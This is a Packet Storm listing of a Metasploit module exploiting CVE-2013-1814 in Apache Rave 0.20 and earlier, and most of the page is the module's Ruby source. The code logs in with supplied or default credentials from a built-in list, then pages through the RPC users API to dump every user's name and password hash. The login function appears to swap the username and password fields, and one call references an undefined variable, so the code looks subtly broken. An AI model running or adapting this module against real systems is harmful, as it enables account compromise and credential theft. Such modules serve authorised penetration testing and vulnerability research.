exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Apache Rave User Information Disclosure

Apache Rave User Information Disclosure
Posted Aug 31, 2024
Authored by juan vazquez, Andreas Guth | Site metasploit.com

This Metasploit module exploits an information disclosure in Apache Rave 0.20 and prior. The vulnerability exists in the RPC API, which allows any authenticated user to disclose information about all the users, including their password hashes. In order to authenticate, the user can provide his own credentials. Also the default users installed with Apache Rave 0.20 will be tried automatically. This Metasploit module has been successfully tested on Apache Rave 0.20.

tags | exploit, info disclosure
advisories | CVE-2013-1814
SHA-256 | 0ee081ebc210103428fee49812e36eeb28870ee37c407fc90e4ae247b331e1bf

Apache Rave User Information Disclosure

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report

def initialize(info = {})
super(update_info(info,
'Name' => 'Apache Rave User Information Disclosure',
'Description' => %q{
This module exploits an information disclosure in Apache Rave 0.20 and prior. The
vulnerability exists in the RPC API, which allows any authenticated user to
disclose information about all the users, including their password hashes. In order
to authenticate, the user can provide his own credentials. Also the default users
installed with Apache Rave 0.20 will be tried automatically. This module has been
successfully tested on Apache Rave 0.20.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Andreas Guth', # Vulnerability discovery and PoC
'juan vazquez' # Metasploit module
],
'References' =>
[
[ 'CVE', '2013-1814' ],
[ 'OSVDB', '91235' ],
[ 'BID', '58455' ],
[ 'EDB', '24744']
]
))

register_options(
[
Opt::RPORT(8080),
OptString.new('TARGETURI', [true, 'Path to Apache Rave Portal', '/portal']),
OptString.new('USERNAME', [ false, 'Apache Rave Username' ]),
OptString.new('PASSWORD', [ false, 'Apache Rave Password' ]),
])
end

def post_auth?
true
end

def login(username, password)
uri = normalize_uri(target_uri.to_s, "j_spring_security_check")

res = send_request_cgi({
'uri' => uri,
'method' => 'POST',
'vars_post' => {
'j_password' => username,
'j_username' => password
}
})

if res and res.code == 302 and res.headers['Location'] !~ /authfail/ and res.get_cookies =~ /JSESSIONID=(.*);/
return $1
else
return nil
end
end

def disclose(cookie, offset)
uri = normalize_uri(target_uri.to_s, "app", "api", "rpc", "users", "get")

res = send_request_cgi({
'uri' => uri,
'method' => 'GET',
'vars_get' => {
'offset' => "#{offset}"
},
'cookie' => "JSESSIONID=#{cookie}"
})

if res and res.code == 200 and res.headers['Content-Type'] =~ /application\/json/ and res.body =~ /resultSet/
return res.body
else
return nil
end

end

def setup
# Default accounts installed and enabled on Apache Rave 0.20
@default_accounts = {
"canonical" => "canonical",
"john.doe" => "john.doe",
"jane.doe" => "jane.doe",
"johnldap" => "johnldap",
"four.col" => "four.col",
"fourwn.col" => "fourwn.col",
"george.doe" => "george.doe",
"maija.m" => "maija.m",
"mario.rossi" => "mario.rossi",
"one.col" => "one.col",
"three.col" => "three.col",
"threewn.col" => "threewn.col",
"twown.col" => "twown.col"
}
end

def report_cred(opts)
service_data = {
address: opts[:ip],
port: opts[:port],
service_name: opts[:service_name],
protocol: 'tcp',
workspace_id: myworkspace_id
}

credential_data = {
origin_type: :service,
module_fullname: fullname,
username: opts[:user],
private_data: opts[:password],
private_type: :password
}.merge(service_data)

login_data = {
core: create_credential(credential_data),
status: Metasploit::Model::Login::Status::UNTRIED,
proof: opts[:proof]
}.merge(service_data)

create_credential_login(login_data)
end


def run

print_status("#{rhost}:#{rport} - Fingerprinting...")
res = send_request_cgi({
'uri' => normalize_uri(target_uri.to_s, "login"),
'method' => 'GET',
})

if not res
print_error("#{rhost}:#{rport} - No response, aborting...")
return
elsif res.code == 200 and res.body =~ /<span>Apache Rave ([0-9\.]*)<\/span>/
version =$1
if version <= "0.20"
print_good("#{rhost}:#{rport} - Apache Rave #{version} found. Vulnerable. Proceeding...")
else
print_error("#{rhost}:#{rport} - Apache Rave #{version} found. Not vulnerable. Aborting...")
return
end
else
print_warning("#{rhost}:#{rport} - Apache Rave Portal not found, trying to log-in anyway...")
end

cookie = nil
unless datastore["USERNAME"].empty? or datastore["PASSWORD"].empty?
print_status("#{rhost}:#{rport} - Login with the provided credentials...")
cookie = login(datastore["USERNAME"], datastore["PASSWORD"])
if cookie.nil?
print_error("#{rhost}:#{rport} - Login failed")
else
print_good("#{rhost}:#{rport} - Login Successful. Proceeding...")
end
end

if cookie.nil?
print_status("#{rhost}:#{rport} - Login with default accounts...")
@default_accounts.each { |user, password|
print_status("#{rhost}:#{rport} - Login with the #{user} default account...")
cookie = login(user, password)
unless cookie.nil?
print_good("#{rhost}:#{rport} - Login Successful. Proceeding...")
break
end
}
end

if cookie.nil?
print_error("#{rhost}:#{rport} - Login failed. Aborting...")
return
end

print_status("#{rhost}:#{rport} - Disclosing information...")
offset = 0
search = true

while search
print_status("#{rhost}:#{rport} - Disclosing offset #{offset}...")
users_data = disclose(cookie, offset)
if users_data.nil?
print_error("#{rhost}:#{rport} - Disclosure failed. Aborting...")
return
else
print_good("#{rhost}:#{rport} - Disclosure successful")
end

json_info = JSON.parse(users_data)

path = store_loot(
'apache.rave.users',
'application/json',
rhost,
users_data,
nil,
"Apache Rave Users Database Offset #{offset}"
)
print_status("#{rhost}:#{rport} - Information for offset #{offset} saved in: #{path}")

print_status("#{rhost}:#{rport} - Recovering Hashes...")
json_info["result"]["resultSet"].each { |result|
print_good("#{rhost}:#{rport} - Found cred: #{result["username"]}:#{result["password"]}")
report_cred(
ip: rhost,
port: rport,
service_name: 'Apache Rave',
user: result["username"],
password: result["password"],
proof: user_data
)
}

page = json_info["result"]["currentPage"]
total_pages = json_info["result"]["numberOfPages"]
offset = offset + json_info["result"]["pageSize"]
if page == total_pages
search = false
end

end

end
end
Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    25 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close